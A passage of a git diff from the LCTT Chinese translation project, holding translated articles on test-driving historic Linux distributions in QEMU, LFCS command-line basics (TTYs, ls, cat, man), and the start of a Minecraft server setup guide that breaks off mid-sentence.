1.0 screenshot](https://opensource.com/sites/default/files/slack1.png "slackware 1.0 screenshot") + +*Slackware 1.01* + +体验 Slackware 1.01 系统最爽的是在 Qemu 模拟器软件 [2014 免费镜像系列][9]中有一个预先制作好的镜像文件,因此你可以不用手动去执行安装任务(真不习惯这种“奢华”待遇)。其引导启动命令如下: + +``` +$ qemu-kvm -m 16M -drive if=ide,format=qcow2,file=slackware.qcow2 \ + -netdev user,id=slirp -device ne2k_isa,netdev=slirp \ + -serial stdio -redir tcp:22122::22 +``` + +在 1993 年那个版本的 Linux 系统中,很多东西都跟我们所想像的一样。所有常用的基本命令,比如 `ls` 和 `cd` 命令的使用方式,以及所有的基本工具(`gawk` , `cut` , `diff` , `perl`,当然还有 [Volkerding][10] 最喜欢的 `elvis` 工具)现在都在使用,而且也包含在如今的 Linux 系统中,但是仍然有一小部分东西让我感到惊讶。当你尝试使用 tab 补全命令方式来列出上百个文件时, BASH 会非常友好的提示用户确认,并且那些查看压缩文件的工具(比如 `zless` 和 `zmore` 以及 `zcat`)都已经出现了。很多方面都超乎我的预计,总之,该系统给人的感觉就是超级现代化。 + +不过,该系统没有软件包管理的相关概念。所有软件的安装和卸载都得手动完成,也不能查询出已安装的软件包。 + +总的来说,Slackware 1.01 系统感觉更像是一个非常现代化的 UNIX 系统,或者更恰当的是,它给人的感觉就是一个 Linux 用户在操作一个现代化的 UNIX 系统。很多东西都非常熟悉,但是也不尽相同。这个在 1993 年发布的操作系统中,并不是所有东西都跟你想像中的一样。 + +### Debian 0.91 版本系统(1994 年) + +为了尝试 Debian 0.91 版本系统,我使用的是 [Ibiblio 数字档案][11] 网站下载的软盘镜像文件,该系统最初发表在 1994 年。启动命令如下: + +``` +$ gunzip bootdsk.gz basedsk1.gz basedsk2.gz +$ qemu-system-i386 -M pc -m 64 -boot order=ac,menu=on \ + -drive file=bootdisk,if=floppy,format=raw \ + -drive file=debian.raw,if=ide,format=raw \ + -device ne2k_isa,netdev=slirp \ + -serial msmouse -vga std \ + -redir tcp:22122::22 \ + -netdev user,id=slirp +``` + +从 Debian 0.91 的启动磁盘启动后进入到一个简洁的 shell 界面,有很清晰的提示信息告诉你下一步将要执行的操作。 + +安装过程进行得非常顺利。从磁盘分区,写入 ext2 文件系统到分区,到显示图形菜单操作界面要经过七个步骤,之后开始复制 `basedsk` 镜像文件。这里使用的是以最小化方式来安装 Debian 系统,跟大家在安装自己的 Linux 系统过程中的很多步骤都非常相似。 + +Debian 系统因其自身的包管理器而出名,但是在早期的版本中只是有一些提示功能而已。有 `dpkg` 命令,但它是一个基于交互式菜单的系统——一种古老的 `aptitude`,有多个层次的可选菜单,并且自然地附带了几个可用软件包。 + +尽管如此,你也可以感受到其简便的设计理念。你只需下载三个软盘镜像文件,最后合成一个可启动的系统,然后就可以使用一个简单的文本菜单来安装更多的东西。我由衷的明白了为什么 Debian 系统如此受欢迎的原因。 + +### Jurix/S.u.S.E. 系统(1996 年) + +![Jurix install screen](https://opensource.com/sites/default/files/jurix_install.png "Jurix install screen") + +*安装 Jurix 系统* + +Jurix 系统是 SUSE 系统的前身, Jurix 带有的二进制的 `.tgz` 软件包会被组织到类似 Slackware 安装包结构的目录中,其安装包本身也跟 Slackware 的安装包很相似。 + +``` + $ qemu-system-i386 -M pc -m 1024 \ + -boot order=ac,menu=on \ + -drive \ + file=jurix/install,if=floppy,format=raw \ + -drive file=jurix.img,if=ide \ + -drive file=pkg.raw,if=ide,format=raw \ + -device ne2k_isa,netdev=slirp \ + -serial msmouse -vga std \ + -redir tcp:22122::22 \ + -netdev user,id=slirp +``` + + +因为我不是刻意去寻找最早期的版本, Jurix 系统是找到的第一个真正’感觉‘像是打算给用户使用的有图形界面的 Linux 发行版。 [XFree86][12] 图形桌面环境已默认安装了,如果你不打算使用该工具,选择退出该环境即可。 + +比如 `/usr/lib/X11/XF86Config` (该文件后来变成 `Xorg.conf` )这个配置文件已经存在了,这让我在使用 GUI 前完成了 90% 的工作,但是我花费了一整个周末的时间来调试 `vsync` ,`hsync`,和 `ramdac` 颜色表重写,最后我完全放弃了。 + +在 Jurix 系统上安装软件包也非常简单;找到源路径下的 `.tgz` 文件,然后运行一个常用的 `tar` 命令: ` $ su -c 'tar xzvf foo.tgz -C /'` 该软件包就会被解压到 root 分区,并准备好使用了。我刚开始的时候安装了几个之前未安装过的软件包,发现操作也很简单、快速且非常可靠。 + +### SUSE 5.1 版本系统(1998 年) + + ![suse install](https://opensource.com/sites/default/files/suse5fvwm.png "suse install") + +*在 SuSE 5.1 系统上运行 FVWM 窗口管理器* + +我是使用 1998 年在马里兰州的一家软件商店里买的 InfoMagic CD-ROM 来安装 SUSE 5.1 系统的。其引导启动命令如下: + +``` + $ qemu-system-i386 -M pc-0.10 -m 64 \ + -boot order=ad,menu=on \ + -drive file=floppy.raw,if=floppy,format=raw \ + -cdrom /dev/sr0 \ + -drive file=suse5.raw,if=ide,format=raw \ + -vga cirrus -serial msmouse +``` + +安装过程相对于前边几次来说要复杂得多。 YasT 工具在软盘和 CD-ROM 光驱之间搞乱了配置文件和设置,还需要重启好多次,在重启了好几次后我才反应过来是我操作顺序不当导致的问题。在安装过程中,我就犯了两次同样的错,我只是习惯了 YasT 工具的安装方式,到第三次才顺利的安装成功,这对于一个 Linux 用户将来的成长来说是一个很大的教训及经验。 + +我使用 SUSE 5.1 的主要目的就是体验其 GUI 桌面环境。配置的过程已经很熟悉了,使用几个漂亮的图形界面工具(包括一个很好用的 `XF86Setup` 前端界面配置工具)来测试和调试鼠标及显示器问题。我用了一个小时不到的时间就调试好 GUI 界面,并正常运行起来,其中大部分时间是耽搁在研究 Qemu 的虚拟显卡可以提供哪种分辨率和颜色方案。 + +可选用的桌面环境包括 fvwm、fvwm2 和 ctwm。我使用的是 fvwm,并且运行得也正常。我发现 tkDesk 这个 dock 式的文件管理器跟 Ubuntu 系统的 Unity 的启动栏非常的相似。 + +使用该系统总的来说还是非常令人愉快的,一旦成功安装了桌面环境并正常运行起来,SUSE 5.1 可以说是取得了令人瞩目的成功。 + +### Red Hat 6.0 版本系统(1999 年) + +![Red Hat 1999](https://opensource.com/sites/default/files/redhat6_gimp_0.png "Red Hat 1999") + +*在 Red Hat 6 系统上运行 GIMP 1.x 图像处理程序* + +下一个系统 Red Hat 6.0 安装盘我刚好家里有。不是 RHEL 6.0 —— 而是 Red Hat 6.0,这是一个在 RHEL 或 Fedora 系统出现之前商店里就有卖的桌面版系统。这个安装盘是我在 1999 年 6 月份买的。 + +其引导启动命令如下: + +``` + $ qemu-system-i386 -M pc-0.10 -m 512 \ + -boot order=ad,menu=on \ + -drive file=redhat6.raw,if=ide,format=raw \ + -serial msmouse -netdev user,id=slirp \ + -vga cirrus -cdrom /dev/sr0 +``` + +整个安装过程由完全由安装向导指引的,并且速度非常快。无论是选择要安装什么包(按**工作站**, **服务器**, 及**自定义**进行分组 ),磁盘分区,或者是启动安装,你都不会出现进行不下去的问题。 + +Red Hat 6 包括一个 `xf86config` 应用程序来一步步指导你完成 X 配置工作,尽管它有一些之后的 X 不认的奇怪的鼠标模拟选项。它比手动修改 Xf86Config 配置文件要容易得多,但是要正确无误的配置好 X 环境显然不是一个简单的工作。 + +Red Hat 6 绑定的桌面环境是 GNOME ,没错就是它,但是窗口管理器是早期的 [Enlightenment][13] ,它同样也提供了主要的声卡服务进程。Xdm 和 gdm 都作为登录管理器包含在其中,以便普通用户没有权限也可以登录到系统中并启动或者关闭 X 桌面进程,这在多用户系统中是非常重要的。 + +它缺少一些主要的应用程序;还没有 gedit 工具,没有重要的统一办公应用程序,更没有软件包管理器。有 GnoRPM 工具,这是一个图形界面的 RPM 包管理工具,用于查看及删除软件包,这个工具跟 yum 或 PackageKit 工具非常类似,还有基于图形界面的文件编辑器 gnotepad+ (尽管没有 Emacs 工具)。 + +总的来说,桌面环境在使用上也是非常直观的。跟后期实现的 GNOME 桌面环境不同,这个早期版本的在屏幕底部有个面板,其中有一个应用程序菜单和启动器图标,在中间位置有个虚拟桌面控制器。我无法想象其它操作系统的用户在使用这个桌面环境时会有多么的不习惯。 + +Red Hat 6 对于 Linux 系统来说是一个巨大的进步,很明显 Linux 系统正向着成为一个适用的桌面系统方向发展。 + +### Mandrake 8.0 版本系统(2001 年) + +![Mandrake 8.0 installer](https://opensource.com/sites/default/files/mandrake8.png "Mandrake 8.0 installer") + +*Mandrake: Linux 系统的一个转折点* + +Mandrake 8.0 于 2001 年发布,这已经可以跟 Apple OS 9.2 和 Windows ME 系统相提并论了。 + +我反而觉得老版本的系统才更安全一些。 + +其引导启动命令如下: + +``` + $ qemu-system-i386 \ + -M pc-0.10 -m 2048 \ + -boot order=ad,menu=on \ + -drive file=mandrake8.qcow2 \ + -usb -net nic,model=rtl8139 \ + -netdev user,id=slirp \ + -vga cirrus \ + -cdrom mandrake-8.0-i386.iso +``` + +我一直觉得 Red Hat 系统的安装过程非常棒了,但是 Mandrake 的安装过程更是让人喜出望外。它非常友好,并且在继续下一步之前还给用户一个测试配置文件的机会,易用高效,使用起来像魔法一样。我也不用导入自己的 `XF86Config` 配置文件,因为 Mandrake 的安装程序会自动完成该任务。 + +![Mandrake install](https://opensource.com/sites/default/files/mandrake8install_new.png "Mandrake install") + +*Mandrake 8.0 系统的安装程序* + +实际上,使用 Mandrake 系统跟使用其它的桌面环境系统的感受基本相同。让我很惊奇是的它们在操作体验上如此的相似。我相信,即使这个时候我在使用 Mandrake 系统的过程中遇到一些问题,以我自己的技术能力甚至是一个技术水平一般的年轻人也很容易解决。它的界面非常直观,帮助文档也很有用,并且软件包管理起来也很容易,只是那个时候人们还不习惯直接到网上下载他们需要的任何软件包来安装。 + +### Fedora 1 版本系统(2003 年) + +![Fedora Core install](https://opensource.com/sites/default/files/fedora1.png "Fedora Core install") + +*基于 Red Hat 的 Fedora 系统 * + +2003 年,新的 Fedora Core 版本系统发布了。 Fedora Core 基于 Red Hat 系统,它的主要目的是在 Red Hat 企业版(RHEL)成为该公司旗舰产品之前继续带动 Linux 桌面版系统的发展。 + +启动老版本的 Fedora Core 1 系统也没啥特别的地方: + +``` + $ qemu-system-i386 -M pc \ + -m 2048 -boot order=ac,menu=on \ + -drive file=fedora1.qcow2 -usb \ + -net nic,model='rtl8139' -netdev user \ + -vga cirrus -cdrom fedora-1-i386-cd1.iso +``` + +安装 Fedora Core 同样简单容易; Fedora 和 Red Hat 系统在之后的 9 年中使用同样的安装器。它同样使用简单易用的图形化界面。 + +![Fedora Anaconda](https://opensource.com/sites/default/files/fedora1anaconda.png "Fedora Anaconda") + +*Anaconda GUI 界面* + +使用 Fedora Core 系统的体验跟 Red Hat 6 或 7 版本没多少区别。 GNOME 图形界面很漂亮,有各种独立的配置程序助手,并且界面展示都非常的整洁和专业。 + +桌面上的 “Start Here” 图标指导用户前往三个位置:应用程序目录,首选项面板和系统设置。 一个红帽的图标表示应用程序菜单,而下边的 GNOME 面板里包括所有最新的 Linux 应用程序启动器,包括 OpenOffice 办公套件和 mozilla 浏览器。 + +### 展望未来 + +在 2000 左右, Linux 系统已经发展得很好并取得了巨大的进步。桌面环境前所未有的更加精致美观,有各种可用的应用程序,安装过程比其它操作操作更简易更高效。事实上,从 2000 年以来,用户和系统之间的关系更加紧密,即使到现在也没发生根本上的改变。当然还有一些更新和改善,以及数量惊人的创新方面的变化。 + +让我们来了解一下各个 Linux 系统项目上的演变: + +* Mandrake 系统后来更名为 Mandriva,如今为 [Mageia][1] ; +* Fedora Core 随后改为 [Fedora][2] ; +* [Ubuntu][3] 脱胎于 [Debian][4] 并且,它让 “Linux” 成为一个家喻户晓的词汇; +* Valve 公司开发的 [SteamOS][5] 成为其官方游戏平台; +* [Slackware][6] 现如今仍在平稳发展。 + +无论你是一个 Linux 新手,还是一个技术精湛的 Linux 老用户,上面的大多数截图都构成了让 Linux 系统被记入历史的一本传记。很高兴今天我们能够回顾成为世界上最大的开源项目之一的 Linux 系统是如何发展壮大起来的。更重要的是,每一次想到自己也是 Linux 开源世界中的一员我们就无比激动,把握现在,展望未来。 + +-------------------------------------------------------------------------------- + +作者简介: + +![](https://opensource.com/sites/default/files/styles/profile_pictures/public/penguinmedallion200x200.png?itok=ROQSR50J) + +Seth Kenlon —— Seth Kenlon 是一位独立多媒体艺术家,开源文化倡导者, Unix 极客。他还是 Slackware 多媒体产品项目的维护人员之一,官网:http://slackermedia.ml 。 + + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/16/12/yearbook-linux-test-driving-distros + +作者:[Seth Kenlon][a] +译者:[rusking](https://github.com/rusking) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/seth +[1]:http://mageia.org/ +[2]:http://fedoraproject.org/ +[3]:http://ubuntu.com/ +[4]:http://debian.org/ +[5]:http://store.steampowered.com/steamos +[6]:http://slackware.com/ +[7]:https://www.flickr.com/photos/internetarchivebookimages/14746482994/in/photolist-ot6zCN-odgbDq-orm48o-otifuv-otdyWa-ouDjnZ-otGT2L-odYVqY-otmff7-otGamG-otnmSg-rxnhoq-orTmKf-otUn6k-otBg1e-Gm6FEf-x4Fh64-otUcGR-wcXsxg-tLTN9R-otrWYV-otnyUE-iaaBKz-ovcPPi-ovokCg-ov4pwM-x8Tdf1-hT5mYr-otb75b-8Zk6XR-vtefQ7-vtehjQ-xhhN9r-vdXhWm-xFBgtQ-vdXdJU-vvTH6R-uyG5rH-vuZChC-xhhGii-vvU5Uv-vvTNpB-vvxqsV-xyN2Ai-vdXcFw-vdXuNC-wBMhes-xxYmxu-vdXxwS-vvU8Zt +[8]:https://www.flickr.com/photos/internetarchivebookimages/14774719031/in/photolist-ovAie2-otPK99-xtDX7p-tmxqWf-ow3i43-odd68o-xUPaxW-yHCtWi-wZVsrD-DExW5g-BrzB7b-CmMpC9-oy4hyF-x3UDWA-ow1m4A-x1ij7w-tBdz9a-tQMoRm-wn3tdw-oegTJz-owgrs2-rtpeX1-vNN6g9-owemNT-x3o3pX-wiJyEs-CGCC4W-owg22q-oeT71w-w6PRMn-Ds8gyR-x2Aodm-owoJQm-owtGp9-qVxppC-xM3Gw7-owgV5J-ou9WEs-wihHtF-CRmosE-uk9vB3-wiKdW6-oeGKq3-oeFS4f-x5AZtd-w6PNuv-xgkofr-wZx1gJ-EaYPED-oxCbFP +[9]:http://www.qemu-advent-calendar.org/2014 +[10]:http://www.slackware.com/~volkerdi/ +[11]:https://ibiblio.org/pub/historic-linux/distributions/debian-0.91/debian-0.91/dist +[12]:http://www.xfree86.org/ +[13]:http://enlightenment.org/ \ No newline at end of file diff --git a/published/20161221 HOW TO INSTALL AND REMOVE SOFTWARE IN UBUNTU .md b/published/201701/20161221 HOW TO INSTALL AND REMOVE SOFTWARE IN UBUNTU .md similarity index 100% rename from published/20161221 HOW TO INSTALL AND REMOVE SOFTWARE IN UBUNTU .md rename to published/201701/20161221 HOW TO INSTALL AND REMOVE SOFTWARE IN UBUNTU .md diff --git a/published/201701/20161222 LFCS Command Line Basics.md b/published/201701/20161222 LFCS Command Line Basics.md new file mode 100644 index 0000000000..91b694b7f0 --- /dev/null +++ b/published/201701/20161222 LFCS Command Line Basics.md @@ -0,0 +1,95 @@ +LFCS 命令行基础 +======================= + +本文中包含了很多命令行基础。我们将讨论 TeleTYpe(TTY)和几个命令及其选项。确保做完所有练习,并要知道,除非另有说明,对 CentOS 和 Ubuntu 都是相同的。 + +### TTY + +当没有图形用户界面(GUI)或当用户在 GUI 之外,Linux 就会使用 TTY。当打开终端窗口时也使用 TTY,但这些是不同类型的 TTY。 + +有三种类型的 TTY: + +1. 物理终端 +2. 本地伪终端 +3. 远程伪终端 + +基本上,每个 Linux 系统有大约六个或七个物理 TTY。 通过按住 `CTRL + ALT` 键,然后在 CentOS 按住 `F1` 到 `F6` ,而在 Ubuntu 中是 `F1` 到 `F7`。 + +**注意:** 一些发行版可能有不同数量的 TTY 和不同的 GUI 默认位置。有点发行版可能有在物理 TTY 之间切换的不同组合键,如 `CTRL + F#` 或 `ALT + F#` ( LCTT 译注:`F#` 代表 F1、F2 等)。当使用 VirtualBox 时,除非您更改了主机键映射,请使用右 CTRL 键。 + +在 CentOS 中,GUI 在 TTY1(`CTRL + ALT + F1`)上,其他物理 TTY 都是基于文本的。 在 Ubuntu 上,GUI 在 TTY7(`CTRL + ALT + F7`)上,其他物理 TTY 都是基于文本的。 + +**注意:** 尝试在另一个 TTY 下加载 GUI 是不明智的,因为这可能耗用大量资源,但你可以这样做。 + +当 Linux 启动时,不管是 CentOS 还是 Ubuntu,都会打开默认 TTY。如果安装了 GUI,对于 CentOS 是打开 TTY1,对于 Ubuntu 是打开 TTY7。如果你打开一个终端窗口(伪 TTY)并使用命令 `who`,你可以看到正在使用的 TTY 的列表。 如图 1 所示。 + +![Figure 01.jpg](https://www.linuxforum.com/attachments/figure-01-jpg.93/) + +*图 1* + +在图 1 中,你可以看到我当前登录到 TTY1(非 GUI)。第二行连接显示我已登录到 GUI(TTY7)以及两个伪 TTY(PTS/1 和 PTS/2)。如图 2,你可以看到新条目显示了远程伪 TTY(PTS/3)。 远程伪连接来自 IP 地址为 192.168.0.11 的系统。 + +![Figure 02.jpg](https://www.linuxforum.com/attachments/figure-02-jpg.94/) + +*图 2* + +可以使用诸如 PuTTY 或任何 SSH 的客户端(如果远程 Linux 系统上启用了 SSH)之类的应用程序进行远程 TTY 连接。 + +如果终端窗口字体比较小,你可以使用 `CTRL + SHIFT` 键和 `+` 键来放大字体。多次按下可以更大。要缩小大小,请使用 `CTRL + SHIFT + -` 不断缩小。要使终端字体恢复为原始大小,请按下 `CTRL + SHIFT + 0`。 + +**注意:** 请注意,如果字体已经足够大或足够小了,组合键就不再工作了。 + +希望你现在已经了解各种类型的 TTY。让我们看看一些可以在 TTY 中使用的命令。 + +### 命令 + +其中一个命令前面已经讨论过了。命令 `who` 用于显示谁登录到了系统。 + +另一个命令是 `pwd`。命令 `pwd` 代表“打印工作目录(Print Working Directory)”。该命令返回你所在的当前目录。例如,如果终端提示符是 `[jbuse@localhost〜]$`,则用户名为 `jbuse`,当前目录为 `〜`。波浪号(`〜`)代表用户的主文件夹。主文件夹应该是 `/home/USERNAME`。用户名是用于登录系统的名称。 + +要列出当前文件夹的内容,请使用命令 `ls`。`ls` 命令代表 List。如果未指定任何选项,则列出当前文件夹。如果给出文件夹名称,则会列出该文件夹的内容。例如,要查看 `media` 文件夹的内容,你可以使用命令 `ls /media`。 + +在 `ls` 命令后面我们可以添加一些选项以显示更多详细信息或特定详细信息。如果你想看到所有的文件夹和文件,即使是隐藏的,请使用选项 `-a`。要查看当前目录中的所有文件和文件夹,请使用命令 `ls -a`。隐藏的文件和文件夹将在名称前面显示一个句点(`.`)。 + +要在每个文件夹名称后看到正斜杠(`/`),请使用 `-F` 选项。当前文件夹列表将是 `ls -F`。`-F` 用于按文件类型对文件进行分类。符号链接在文件夹名称后用 `@` 表示。 + +你可以把这两个选项连在一起形成 `ls -aF`。 + +**注意:** 一些选项可能有不同的大小写。选项区分大小写。 + +另一个选项是显示长列表的 `-l`。示例输出如图 3 所示。文件夹和文件名称列在右侧。文件为白色,文件夹为深蓝色,符号链接为浅蓝色。如图 3 所示,符号链接 `vtrgb` 链接自 `/etc/alternatives/vtrgb` 。 + +![Figure 03.jpg](https://www.linuxforum.com/attachments/figure-03-jpg.95/) + +*图 3* + +左侧的第一列是文件或文件夹的权限。第一个字母是 `d` 的为目录,是 `-` 的为文件。接下来的三个字母显示所有者的权限(`r` - 读、`w` - 写、`x` - 执行),后面是组权限以及“其他人”的权限。下一列数字显示指向文件或文件夹的链接数。再下一列是所有者名称,后面是所有组名称。再下一列是文件或文件夹在存储设备上占用的字节数。接下来的三列是文件上次修改的月份、日期和年份。最后一列是路径名。 + +目前为止,你可以看到列表是按字母顺序排序。要颠倒从 “z” 到 “a” 而不是 “a” 到 “z” 的顺序,请使用 `-r` 选项。逆转选项 `-r` 使 ls 命​​令反转输出顺序。 + +要按修改的时间戳列出文件,请使用 `-t` 选项。顺序是从最近修改到最早的修改日期。当然,在命令 `ls -tr` 中,同时使用 `-t` 和 `-r` 颠倒了顺序。 + +如果你不喜欢看文件的长长的字节数,使用选项 `-h`。输出将会更易读,如显示 `4.0K` 而不是 `4096`。 + +要获取单个文件夹的特定信息,请使用选项 `-d`,但必须指定该文件夹。例如,要查看文件夹 `/media` 的详细信息,请使用命令 `ls -ld /media`。 + +另一个要熟悉的命令是命令 `cat`。命令 `cat` 用于将标准输入(文件)复制到标准输出(屏幕)。使用 `cat` 可以轻松地查看文件的内容。例如,要查看名为 `text` 的文件的内容,如果你与文件 `text` 在同一个文件夹中请使用命令 `cat text`。如果你不在同一个文件夹中,那么你必须指定位置。例如,如果文件 `text` 在文件夹 `/home/jarret/test/` 中,那么命令将是 `cat /home/jarret/test/text`。 + +另一个非常有用的命令是 `man`。`man` 命令用于查看特定命令的文档。例如,要查看命令 `ls` 的帮助页面,请使用命令 `man ls`。 + +**注意:** 记住,在 LFCS 考试中,你可以使用 `man` 命令。 + +查看这些命令并测试它们以熟悉它们。使用 `man` 命令,查看本文中的命令以查看其他可用的选项。 + + +-------------------------------------------------------------------------------- + +via: https://www.linuxforum.com/threads/lfcs-command-line-basics.3334/ + +作者:[Jarret][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxforum.com/members/jarret.268/ diff --git a/published/20161223 Best 4 Command Line Download Managers-Accelerators for Linux.md b/published/201701/20161223 Best 4 Command Line Download Managers-Accelerators for Linux.md similarity index 100% rename from published/20161223 Best 4 Command Line Download Managers-Accelerators for Linux.md rename to published/201701/20161223 Best 4 Command Line Download Managers-Accelerators for Linux.md diff --git a/published/20161224 10 Interesting Linux Command Line Tricks and Tips Worth Knowing.md b/published/201701/20161224 10 Interesting Linux Command Line Tricks and Tips Worth Knowing.md similarity index 100% rename from published/20161224 10 Interesting Linux Command Line Tricks and Tips Worth Knowing.md rename to published/201701/20161224 10 Interesting Linux Command Line Tricks and Tips Worth Knowing.md diff --git a/published/201701/20161225 Minecraft Server on Linux.md b/published/201701/20161225 Minecraft Server on Linux.md new file mode 100644 index 0000000000..11795c46fb --- /dev/null +++ b/published/201701/20161225 Minecraft Server on Linux.md @@ -0,0 +1,162 @@ +Linux 上搭建 Minecraft 服务器 +=============== + +![Title.jpg](https://www.linuxforum.com/attachments/title-jpg.89/) + +“我的世界(Minecraft)”是一个人们可以在各种游戏主机和计算机上玩的主流游戏。 截止至 2016 年 6 月,在各种平台上已经售出了超过十亿六千万份。因其受欢迎,你可能想在家里举办一个“我的世界”派对,那么你就需要安装一个 “我的世界” 服务器,让所有的玩家连接到同一个世界中一起玩。 + +### 系统要求 + +要开始的话,你需要一个有相当数量内存的 Linux 操作系统。你要在服务器上容纳的玩家越多,你就需要越多的内存。硬盘空间倒不是需求很大,只要足够去安装 Java 以及“我的世界”服务器 Java 文件就行。Minecraft 服务器需要有一个稳定的网络连接,不管是有线还是无线网络。 + +让我们看看 “我的世界”服务器最低要求: + +- **CPU:**双核或更好。 +- **内存:** 2 GB (20-40 用户量),3 GB(30-60 用户量),8 GB(60+ 用户量)。 +- **系统:** 不需要图形化用户接口,可以留出更多的空闲资源。 + +**备注:** 这是“我的世界” 服务端程序的需求,而不是一个完整的操作系统的需求。如果可以给我的世界服务器分配更多的资源,它将运行得更好。 + +###安装 Java + +如果你用 Linux 操作系统运行它的话,你需要安装最新版本的 Java 环境。 + +为了验证你的 Java 版本,位于终端输入以下命令:`java -version`。结果应该是: + +``` +java version "1.8.0_101" + +Java(TM) SE Runtime Environment (build 1.8.0_101-b13) + +Java HotSpot(TM) Client VM (build 25.101-b13, mixed mode) +``` + +如果你当前的 Java 版本不是 1.8 或者更高,则通过在 Ubuntu 系统的终端下执行以下操作来安装 Java 版本 8: + +``` +sudo add-apt-repository ppa:webupd8team/java +sudo apt-get update +sudo apt-get install oracle-java8-installer +``` + +**注意:**如果 `add-apt-repository` 命令无法找到,运行 `sudo apt-get install software-properties-common` 来安装。 您还可以将第三个命令中更改为 `oracle-java9-installer` 来安装最新的 java 版本。 + +对于 Redhat 系统(如 CentOS),请使用以下命令: + +``` +sudo yum install java-1.8.0-openjdk +``` + +安装后,核实键入版本命令 `java-version` ,并且核实输出。这样你就有了一个适当的 Java 版本,你可以继续进行接下来的安装。 + +### “我的世界”服务器版本下载 + +接下来做的事就是去检查用户将运行的“我的世界”的版本。图 1 显示了一个正在运行的 ”我的世界“ ,注意左下角的版本号。 + +![Figure 01.jpg](https://www.linuxforum.com/attachments/figure-01-jpg.85/) + +*图 1* + +请记住“我的世界”客户端版本号。每个客户端应该是相同的版本才行。 + +您接下来要做的是下载客户端所需要的“我的世界”的服务器版本。为了下载该版本你需要知道它的位置。得到所需的文件的命令是: + +``` +sudo wget https://s3.amazonaws.com/Minecraft.Download/versions/[version]/minecraft_server.[version].jar +``` + +在 图1 看到,版本号是 1.10.2。那么这个命令就该变成: + +``` +sudo wget https://s3.amazonaws.com/Minecraft.Download/versions/1.10.2/minecraft_server.1.10.2.jar +``` + + +当你下载好文件,会保存到你当前目录下。使用命令 `pwd` 确定当前位置。 + +一旦你有了该文件,知道它所保存的文件夹就可以继续了。 + +### 服务器信息 + +在启动“我的世界”服务器之前,您必须知道当前系统上能被你使用的可用内存大小。 当启动“我的世界”服务器时,你将需要指定起始内存量和当更多玩家加入时最大分配的内存量。 再次提示,重要的是要有足够的内存。 如果可以,使用最小化安装操作系统来留出更多的内存,例如最小化安装的 Ubuntu。 + +一旦你有了所需的“我的世界”服务器文件,就可以确定分配给“我的世界”的内存数量。 要确定可用内存,打开一个终端并键入以下命令 ,示例输出如图 2 所示: + +``` +free -h +``` + +![Figure 02.jpg](https://camo.githubusercontent.com/686cb2c9421f276e1cab0b08b713f636ed3ca614/68747470733a2f2f7777772e6c696e7578666f72756d2e636f6d2f6174746163686d656e74732f6669677572652d30322d6a70672e38362f) + +*图 2* + +如图 2 所示,在这个低端系统上你可以看到那只有 684 MB 空闲内存。这不是一个可以用于搭建一个 “我的世界” 服务器的系统。在另一个服务器上我有 2.8 GB 内存可供给“我的世界” 使用。 + +在我们启动服务器之前,我们需要找到服务器的 IP 地址。 为此,请运行命令 `ifconfig`。 如图 3 所示,应该列出了网络连接,显示 `Internet Address` 或 `inet addr`,这里是 `192.168.0.2`。 在我的服务器系统上,它列出的地址是 `192.168.0.14`,这个地址是客户端系统将要使用的地址。 + + ![Figure 03.jpg](https://camo.githubusercontent.com/62dc2bfe97f8df7895d606c594d74f27b4881ee4/68747470733a2f2f7777772e6c696e7578666f72756d2e636f6d2f6174746163686d656e74732f6669677572652d30332d6a70672e38372f) + +*图 3* + +### 启动“我的世界”服务器 + +下一步才是真正的启动“我的世界”服务器。在我们实际开始前,会涉及到几个选项。当启动“我的世界”服务器时,你需要指定用多少内存来初始化“我是世界”。 您还将指定使用的最大内存量。 + +如果我的系统有 3.7GB 闲置内存,我知道会有不到 40 位玩家,于是我只需要划出 2GB。当然,我可以增加些以允许用户增长。如果需要的话,我还可以留一点内存给系统运行。我将最小值设置为 2 GB,最大值设置为 3 GB。 由于最大值设置为 3 GB,如果需要的话,还可以至少留给系统 700 MB 内存,但这只有在“我的世界”服务器使用超过最初分配的2 GB 时才会发生。 + +启动服务器的命令行是: + +``` +sudo java -Xms# -Xmx# -jar [path]/minecraft_server.[version].jar nogui +``` + +现在解释一下命令结构: + +- -Xms# - 初始启动分配的内存(`-Xms2048m`) +- -Xmx# - 最大分配的内存(`-Xmx3096m`) +- [path] – “我的世界” 服务器文件路径( `/home/tux/MCS/`) +- [version] – 下载的“我的世界” 服务器的版本(`1.10.2`) +- nogui – 用于以基于文本的界面来显示,可以减少内存使用。如果你使用图形化界面,那么移除 `nogui` 选项。 + +一个使用 2GB 内存以及最大 3GB、位置为 `/home/tux/MCS`、 版本号为 `1.10.2` 的系统的完整命令实例是: + +``` +sudo java -Xms2048m -Xmx3096m -jar /home/tux/MCS/minecraft_server.1.10.2.jar nogui +``` + +**注意:** 这里内存容量的大小是兆字节单位。容量要乘以 1024。举个例子,2GB 的内存使 2 与 1024 相乘,容量为 2048。但别忘小写字母 `m` 是特指兆字节。你可以简单地使用特指的 `2g` 和 `3g` 来表示 2GB 和 3GB。 + +在你首次运行服务器时会发成一些错误。开始之前,它表明需要同意 “最终用户许可协议 EULA”。 + +要同意 “最终用户许可协议 EULA”,你需要编辑与“我的世界”服务器 JAR 文件同一文件夹下的的 `eula.txt` 文件。 + +使用一个类似 `nano` 的文件编辑器打开文件 `eula.txt` 文件。确定你进行这步时使用的是 root 权限。将行 `eula = false` 更改为 `eula = true`,并保存文件。 + +现在,再次输入上述命令以启动服务器。 应该滚过满屏幕信息,然后一个状态行将显示它的创建过程。 当其这个初始世界创建好之后,状态行将显示 100%。 有关系统时间更改的任何错误消息是正常的,因此忽略它们。 + +此时,你可以打开客户端程序并且看到如上图 1 的界面。点击“Multiplayer”按钮。在下一屏幕,如图 4,选择 “Direct Connect”,这将提示您输入服务器地址,因此键入“我的世界”服务器的 IP 地址。你现在应该已经连接到游戏了。 + + + ![Figure 04.jpg](https://camo.githubusercontent.com/6893151530092ac59b7b04d17ca5bc07d9bfc9b4/68747470733a2f2f7777772e6c696e7578666f72756d2e636f6d2f6174746163686d656e74732f6669677572652d30342d6a70672e38382f) + +*图 4* + +### 连接的某些麻烦 + +如果一些客户端无法连接到服务器,那么你需要按下 `CTRL+Z` 退出 Java 程序。打开文件 